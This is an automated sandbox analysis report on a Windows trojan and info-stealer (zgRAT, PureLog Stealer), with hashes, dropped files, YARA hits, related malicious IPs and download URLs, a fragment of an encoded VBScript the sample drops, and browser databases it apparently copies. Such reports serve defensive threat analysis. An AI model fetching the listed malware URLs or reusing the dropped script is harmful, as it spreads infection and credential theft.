                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:16
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:hT7clR9Gz2.exe
                                                renamed because original name is a hash value
                                                Original Sample Name:0CADB063C76CEC669E88F104493A56F1.exe
                                                Detection:MAL
                                                Classification:mal100.troj.spyw.evad.winEXE@18/298@1/1
                                                EGA Information:
                                                • Successful, ratio: 100%
                                                HCA Information:Failed
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe
                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                • Not all processes were analyzed, report is missing behavior information
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                • Report size getting too big, too many NtCreateFile calls found.
                                                • Report size getting too big, too many NtOpenFile calls found.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                • VT rate limit hit for: hT7clR9Gz2.exe
Time | Type | Description
22:27:38 | API Interceptor | 196382x Sleep call for process: vVSUwBXtljAfFANPiZBBPFzlgh.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
91.227.16.11 | file.exe | malicious | DanaBot, SmokeLoader | h167471.srv11.test-hf.su/65.exe
91.227.16.11 | file.exe | malicious | DanaBot, SmokeLoader | h167471.srv11.test-hf.su/65.exe
91.227.16.11 | file.exe | malicious | Pushdo, DanaBot, SmokeLoader | h167471.srv11.test-hf.su/64.exe
91.227.16.11 | file.exe | malicious | Pushdo, DanaBot, SmokeLoader | h167471.srv11.test-hf.su/64.exe
91.227.16.11 | file.exe | malicious | Pushdo, DanaBot, SmokeLoader | h167471.srv11.test-hf.su/64.exe
91.227.16.11 | GyTbKONlyq.exe | malicious | Pushdo, DanaBot, SmokeLoader | h167471.srv11.test-hf.su/64.exe
91.227.16.11 | file.exe | malicious | SmokeLoader | h167159.srv11.test-hf.su/61.exe
91.227.16.11 | file.exe | malicious | RHADAMANTHYS, RedLine, SmokeLoader | h167159.srv11.test-hf.su/54.exe
91.227.16.11 | file.exe | malicious | RHADAMANTHYS, RedLine, SmokeLoader | h167159.srv11.test-hf.su/54.exe
91.227.16.11 | file.exe | malicious | SmokeLoader | h167159.srv11.test-hf.su/52.exe
                                                No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
EXIMIUS-ASRU | file.exe | malicious | PrivateLoader, RedLine | 91.227.16.22
EXIMIUS-ASRU | New_Text_Document.exe | malicious | FormBook, Lokibot, NSISDropper, RedLine | 91.227.16.22
EXIMIUS-ASRU | http://h171008.srv22.test-hf.su/timesync.exe | malicious | Unknown | 91.227.16.22
EXIMIUS-ASRU | file.exe | malicious | Amadey, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, RedLine | 91.227.16.22
EXIMIUS-ASRU | file.exe | malicious | Amadey, Babuk, Djvu, Glupteba, RedLine, SmokeLoader, Vidar | 91.227.16.22
EXIMIUS-ASRU | file.exe | malicious | LummaC Stealer, SmokeLoader | 91.227.16.22
EXIMIUS-ASRU | file.exe | malicious | LummaC Stealer, SmokeLoader | 91.227.16.22
EXIMIUS-ASRU | lpD7vDCZmS.exe | malicious | SmokeLoader | 91.227.16.22
EXIMIUS-ASRU | file.exe | malicious | RedLine, SmokeLoader | 91.227.16.22
EXIMIUS-ASRU | file.exe | malicious | DanaBot, RedLine, SmokeLoader | 91.227.16.22
                                                No context
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\Desktop\AyILZeLM.log | 8G3thfOYd2.exe | malicious | DCRat, PureLog Stealer, zgRAT
C:\Users\user\Desktop\AyILZeLM.log | z28NBu7i9a.exe | malicious | DCRat
C:\Users\user\Desktop\AyILZeLM.log | fzUk1a18ai.exe | malicious | DCRat
C:\Users\user\Desktop\AyILZeLM.log | 3BZPHrgjMP.exe | malicious | DCRat, PureLog Stealer, zgRAT
C:\Users\user\Desktop\AyILZeLM.log | 1978044967A8E1C7F632630BC906C6D66B0E64C356345.exe | malicious | DCRat, PureLog Stealer, zgRAT
C:\Users\user\Desktop\AyILZeLM.log | tQxaElvX5D.exe | malicious | DCRat, PureLog Stealer, zgRAT
C:\Users\user\Desktop\AyILZeLM.log | 1E32C7CE3FECDE38E78A565C4CA60571ACA2B5B2A1C95.exe | malicious | DCRat, PureLog Stealer, zgRAT
C:\Users\user\Desktop\AyILZeLM.log | 4y2bJd0meT.exe | malicious | DCRat, PureLog Stealer, zgRAT
C:\Users\user\Desktop\AyILZeLM.log | 3b9330b09929cc5391a31e5780a967d26f21b010b586b.exe | malicious | DCRat, PureLog Stealer, zgRAT
C:\Users\user\Desktop\AyILZeLM.log | Px0b16q72c.exe | malicious | DCRat, PureLog Stealer, zgRAT
                                                                    Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):164
                                                                    Entropy (8bit):5.709830859027171
                                                                    Encrypted:false
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):117
                                                                    Entropy (8bit):5.52401392067168
                                                                    Encrypted:false
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:Gvz4EULtBHWAYdeIPgZVsaa14Y0ckIBoFqi6VW1INlRzEJ0ytO2glMXpV79pdtI3Gs5r4ix2pQHGJkxviBsWQeD2S2lYWMpddYtWOI4Lb91UEQguKOHbB
                                                                    Process:C:\Users\user\Desktop\hT7clR9Gz2.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):196
                                                                    Entropy (8bit):5.620418390901996
                                                                    Encrypted:false
                                                                    SSDEEP:6:GivwqK+NkLzWbHdrFnBaORbM5nCCPFXws:Gi2MCzWLdhBaORbQCCNXP
                                                                    MD5:8E8F26EC5A1C5C75E2B98BC19B645C85
                                                                    SHA1:2694D857966DF48E85DEC95D779B42B85C846655
                                                                    SHA-256:F20A2B72E59C03DB362FA0A6752198C6CF199563451606302B30BC2C782BA8FC
                                                                    SHA-512:9EB876B1924478C5C9AB9F8C37127A42958C694767C571B43C12D7D43A51CDA3830AE6D0F9ED030884FDEA6D65F95AA33E457F2A2BD5AAE7B4112021CBBDA6D3
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    Reputation:low
                                                                    Preview:#@~^qwAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v X!ZT*@#@&U+DP.ktU4+^V~',Z.nmY+}8L.mYvE.?1DbwORj4.VsJ*@#@&q/4j4+Vs "EUPr/=zKKDDZWs:KUzJLA+~I)Oc4lDE~,!~,WCVk+mjUAAA==^#~@.
                                                                    Process:C:\Users\user\Desktop\hT7clR9Gz2.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):5964288
                                                                    Entropy (8bit):4.5343894630953825
                                                                    Encrypted:false
                                                                    SSDEEP:49152:zBen3JIJW4ZHgnhjzihnWA+L6w0P3bgKVTiypcl3EQOC:zBrcihnSAEeuYQO
                                                                    MD5:6BB2A8990AE25FE86B233C31D6CB93BC
                                                                    SHA1:1FE6C029BDD0CE0E6F7A61250AF6D9EE0E4C42B4
                                                                    SHA-256:6DE635A094F86EAFCE2BDFBB583CBF14986B5059CF20FEC918A86CCC9E6737B0
                                                                    SHA-512:E27F5D229C1919276B5BFE4D010F4BD5D8B4C823FF62FEF89FCF26DC137FF30DD9A4BB8319D503873CBFD893286AB23164C25CC194EBBC54ECC638D2A61C02BA
                                                                    Malicious:true
                                                                    Yara Hits:
                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\PortCommon\hyperbrokerhostNetsvc.exe, Author: Joe Security
                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\PortCommon\hyperbrokerhostNetsvc.exe, Author: Joe Security
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 88%
                                                                    Reputation:low
                                                                    Process:C:\Users\user\Desktop\hT7clR9Gz2.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):92
                                                                    Entropy (8bit):5.2052552982837055
                                                                    Encrypted:false
                                                                    SSDEEP:3:4qstXR+v0NvQIRqiorKf1KLK6y3KvIWHGL4A+n:4qstXR80OIRfNKLK6y6A/L4A+n
                                                                    MD5:357300AE11B147BE136AE313EA36F684
                                                                    SHA1:E0E90C63FFE4A2E2A9CD75376A26BF65CA95E30A
                                                                    SHA-256:60D997F9E8517179DAE17825293CEF429DD8CAFC9A093F8F1CC2DA75B5F7C409
                                                                    SHA-512:85FE5047BA33EF25BDB253C11618CF8F91DE7566B991E5EEE2522EEC0538AB30F6540B20A83A7912DBC08726E1BBAA205585ABB262DB0EA592BF7E3BF4413384
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:%xOzaUEhHvnnVy%%eBBuaXywNgQ%..%FbhLolflUAdtO%"C:\PortCommon/hyperbrokerhostNetsvc.exe"%kUYV%
                                                                    Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):5964288
                                                                    Entropy (8bit):4.5343894630953825
                                                                    Encrypted:false
                                                                    SSDEEP:49152:zBen3JIJW4ZHgnhjzihnWA+L6w0P3bgKVTiypcl3EQOC:zBrcihnSAEeuYQO
                                                                    MD5:6BB2A8990AE25FE86B233C31D6CB93BC
                                                                    SHA1:1FE6C029BDD0CE0E6F7A61250AF6D9EE0E4C42B4
                                                                    SHA-256:6DE635A094F86EAFCE2BDFBB583CBF14986B5059CF20FEC918A86CCC9E6737B0
                                                                    SHA-512:E27F5D229C1919276B5BFE4D010F4BD5D8B4C823FF62FEF89FCF26DC137FF30DD9A4BB8319D503873CBFD893286AB23164C25CC194EBBC54ECC638D2A61C02BA
                                                                    Malicious:true
                                                                    Yara Hits:
                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\PortCommon\sihost.exe, Author: Joe Security
                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\PortCommon\sihost.exe, Author: Joe Security
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 88%
                                                                    Reputation:low
                                                                    Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):5964288
                                                                    Entropy (8bit):4.5343894630953825
                                                                    Encrypted:false
                                                                    SSDEEP:49152:zBen3JIJW4ZHgnhjzihnWA+L6w0P3bgKVTiypcl3EQOC:zBrcihnSAEeuYQO
                                                                    MD5:6BB2A8990AE25FE86B233C31D6CB93BC
                                                                    SHA1:1FE6C029BDD0CE0E6F7A61250AF6D9EE0E4C42B4
                                                                    SHA-256:6DE635A094F86EAFCE2BDFBB583CBF14986B5059CF20FEC918A86CCC9E6737B0
                                                                    SHA-512:E27F5D229C1919276B5BFE4D010F4BD5D8B4C823FF62FEF89FCF26DC137FF30DD9A4BB8319D503873CBFD893286AB23164C25CC194EBBC54ECC638D2A61C02BA
                                                                    Malicious:true
                                                                    Yara Hits:
                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\PortCommon\vVSUwBXtljAfFANPiZBBPFzlgh.exe, Author: Joe Security
                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\PortCommon\vVSUwBXtljAfFANPiZBBPFzlgh.exe, Author: Joe Security
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 88%
                                                                    Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                    File Type:ASCII text, with very long lines (633), with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):633
                                                                    Entropy (8bit):5.895847627376929
                                                                    Encrypted:false
                                                                    SSDEEP:12:HhnQ/5yL6+1zLkIc4oEmdWkIuFx6IGA1ZaIo5OP/0lIW3:H9Q/5D+hLjcCm1Q+Psz
                                                                    MD5:8588116798461EAA11E728C86C8D444F
                                                                    SHA1:E5EC3B6544E10DD818001829EF78161D1536B8C4
                                                                    SHA-256:BF5A0181B2F72D4B012B8777C79398408957380C14C016111C96728BCCD2960F
                                                                    SHA-512:B21EA969F66C21AF0B643739BACCC218F878CF1CC802399BC59BAF1EE4726FE16C2D9CAA89CC71573F93146F9C12D288640580B8769B3BC0139EDC56F73E0C86
                                                                    Malicious:false
                                                                    Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):5964288
                                                                    Entropy (8bit):4.5343894630953825
                                                                    Encrypted:false
                                                                    SSDEEP:49152:zBen3JIJW4ZHgnhjzihnWA+L6w0P3bgKVTiypcl3EQOC:zBrcihnSAEeuYQO
                                                                    MD5:6BB2A8990AE25FE86B233C31D6CB93BC
                                                                    SHA1:1FE6C029BDD0CE0E6F7A61250AF6D9EE0E4C42B4
                                                                    SHA-256:6DE635A094F86EAFCE2BDFBB583CBF14986B5059CF20FEC918A86CCC9E6737B0
                                                                    SHA-512:E27F5D229C1919276B5BFE4D010F4BD5D8B4C823FF62FEF89FCF26DC137FF30DD9A4BB8319D503873CBFD893286AB23164C25CC194EBBC54ECC638D2A61C02BA
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 88%
                                                                    Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                    File Type:ASCII text, with very long lines (700), with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):700
                                                                    Entropy (8bit):5.902336958158354
                                                                    Encrypted:false
                                                                    SSDEEP:12:Dm1LWJPrQ3TLV+b6UpTjMgbLusw4K6JTxp8Eqv7WcGOLVdWGyvXSRIaVQl:jPrQ3TcbXpMyLnw4K6IgvXSiaI
                                                                    MD5:4275D4BE536E64F41A31B79FBBA5042A
                                                                    SHA1:B71CDA1BD24C50EB2D0F6881E0C9665FF683F69C
                                                                    SHA-256:FFEDC11DC6C89C5ADE23A8366774C04CA248FF0918189F11D2EDC3F22AD7055C
                                                                    SHA-512:33C2888529FFC24826706813400C985AC2C4FBBAFE6B5AA7CCF43CABEC4FAEE9055F56DE05A520484CF319E81A5B651E6128ABFFF7DC7491B1AD0EA4BA8B8097
                                                                    Malicious:false
                                                                    Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):5964288
                                                                    Entropy (8bit):4.5343894630953825
                                                                    Encrypted:false
                                                                    SSDEEP:49152:zBen3JIJW4ZHgnhjzihnWA+L6w0P3bgKVTiypcl3EQOC:zBrcihnSAEeuYQO
                                                                    MD5:6BB2A8990AE25FE86B233C31D6CB93BC
                                                                    SHA1:1FE6C029BDD0CE0E6F7A61250AF6D9EE0E4C42B4
                                                                    SHA-256:6DE635A094F86EAFCE2BDFBB583CBF14986B5059CF20FEC918A86CCC9E6737B0
                                                                    SHA-512:E27F5D229C1919276B5BFE4D010F4BD5D8B4C823FF62FEF89FCF26DC137FF30DD9A4BB8319D503873CBFD893286AB23164C25CC194EBBC54ECC638D2A61C02BA
                                                                    Malicious:true
                                                                    Yara Hits:
                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Microsoft Office 15\ClientX64\wininit.exe, Author: Joe Security
                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Microsoft Office 15\ClientX64\wininit.exe, Author: Joe Security
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 88%
                                                                    Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):1698
                                                                    Entropy (8bit):5.367720686892084
                                                                    Encrypted:false
                                                                    SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkrJHV1qHGIs0HK1HmHKlT4x:iqbYqGSI6oPtzHeqKkt1wmj0q1GqZ4x
                                                                    MD5:1CC465BAC3EF7B2D68EBEDF067EF45EA
                                                                    SHA1:2C2DEC3CF0CBCCF3B3238ADEB28524C909BA5273
                                                                    SHA-256:F4604427137BD1C68C5FC6CA6A23DA69977F78ACE88B0C1D3BEBCFA59D64B6F6
                                                                    SHA-512:EE3CB2F0E3696758A3D7E15D9F2B9436EC7307509259AEF502892AE665F59BC50EA75C47200D73BBA4C90A8C07B5736843CDC75CAA4751531D5541AF934CFE51
                                                                    Malicious:false
                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyT
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.8439810553697228
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                    MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                    SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                    SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                    SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.8439810553697228
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                    MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                    SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                    SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                    SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.6732424250451717
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
